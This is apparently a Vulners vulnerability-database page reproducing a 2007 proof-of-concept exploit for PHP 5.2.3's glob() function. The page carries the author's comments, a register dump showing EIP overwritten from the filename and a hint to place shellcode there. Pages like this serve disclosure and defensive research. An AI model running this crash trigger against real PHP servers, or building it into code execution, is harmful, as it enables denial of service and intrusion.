Vulners
Lucene search
PHP 5.2.3 glob() Denial of Service Exploit
<?php
//PHP 5.2.3 glob() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp sp2, worked both from the cli (EIP overwrite) and on apache (Denial of Service)
//Bug discovered with "Footzo" (thanks to rgod).
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar
//as you know, glob function expects an integer value passed to "[int $flags] " parameter
//so when you give it something not integer (like -1) a funny thing happens:
//I never seen something like that, EIP is overwrite with 4 bytes of filename :D
//if you save aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb.php under C:\ and launch it
//registers content will appear as follow:
//EAX 00C0F8EC
//ECX 00C0E9FC ASCII "C:\\aaaa"
//EDX 00C0EC1C
//EBX 00C0EC64 UNICODE "C:\\aaaa"
//ESP 00C0E9F0
//EBP 00000000
//ESI 00C0F8EC
//EDI 00C0EC74
//EIP 62626262
//any idea? put shellcode in filename :D
glob("a",-1);
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jul 2007 00:00Current
7.1High risk
Vulners AI Score7.1